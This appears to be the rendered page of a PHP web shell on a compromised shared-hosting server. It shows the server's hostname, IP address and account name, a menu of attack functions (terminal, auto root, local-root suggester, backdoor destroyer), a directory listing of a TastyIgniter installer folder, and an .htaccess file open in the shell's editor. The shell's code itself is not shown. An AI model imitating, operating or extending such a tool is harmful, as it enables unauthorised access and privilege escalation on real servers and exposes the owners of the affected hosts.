Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
tastyigniter /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
php53
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
php56
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
php71
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
php81
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
php82
[ DIR ]
drwxr-xr-x
2025-01-01 08:01
.env
695
B
-rw-r--r--
2022-06-09 00:13
.htaccess
1.5
KB
-rw-r--r--
2024-12-16 00:45
clone.php
9.98
KB
-rw-r--r--
2024-12-31 00:00
edit.php
5.69
KB
-rw-r--r--
2024-12-31 00:00
edit.xml
433
B
-rw-r--r--
2021-12-23 00:54
extend.php
9.07
KB
-rw-r--r--
2024-12-31 00:00
fileindex.php
289
B
-rw-r--r--
2021-12-23 00:54
import.php
5.07
KB
-rw-r--r--
2024-12-31 00:00
info.xml
4.89
KB
-rw-r--r--
2024-12-20 01:47
install.js
921
B
-rw-r--r--
2021-12-23 00:54
install.php
5.12
KB
-rw-r--r--
2024-12-31 00:00
install.xml
1.31
KB
-rw-r--r--
2021-12-23 00:54
md5
1.59
KB
-rw-r--r--
2024-12-31 00:00
notes.txt
1.14
KB
-rw-r--r--
2024-09-15 23:15
tastyigniter.sql
96.53
KB
-rw-r--r--
2025-01-01 08:01
tastyigniter.zip
19.03
MB
-rw-r--r--
2025-01-01 08:01
update_pass.php
497
B
-rw-r--r--
2021-12-23 00:54
Save
Rename
<IfModule mod_rewrite.c> <IfModule mod_negotiation.c> Options -MultiViews -Indexes </IfModule> ## You may need to uncomment the following line for some hosting environments, ## to use URL Alias you need to be running apache with mod_rewrite enabled. ## # Options +FollowSymlinks ## Turn on URL rewriting ## RewriteEngine On ## !IMPORTANT! You may need to uncomment the following line for some hosting environments, ## If your installation resides in a subdirectory, enter the name here also ## RewriteBase [[_relativeurl]] # Handle Authorization Header RewriteCond %{HTTP:Authorization} . RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] ## Redirect index.php from url to prevent duplicate urls ## RewriteCond %{THE_REQUEST} /index\.php [NC] RewriteRule ^(.*?)index\.php[^/] /$1? [L,R=301,NC,NE] RewriteCond %{THE_REQUEST} /index\.php [NC] RewriteRule ^(.*?)index\.php(?:/(.*))?$ /$1$2? [L,R=301,NC,NE] ## Redirect Trailing Slashes If Not A Folder... ## RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} (.+)/$ RewriteRule ^ %1 [L,R=301] ## Block all PHP files, except index ## RewriteCond %{REQUEST_FILENAME} -f RewriteCond %{REQUEST_FILENAME} \.php$ RewriteRule !^index.php index.php [L,NC] ## Blacklisted folders ## RewriteRule ^assets/downloads/(.*) not_found [L] # Handle Front Controller... ## RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^ index.php [L,QSA] </IfModule>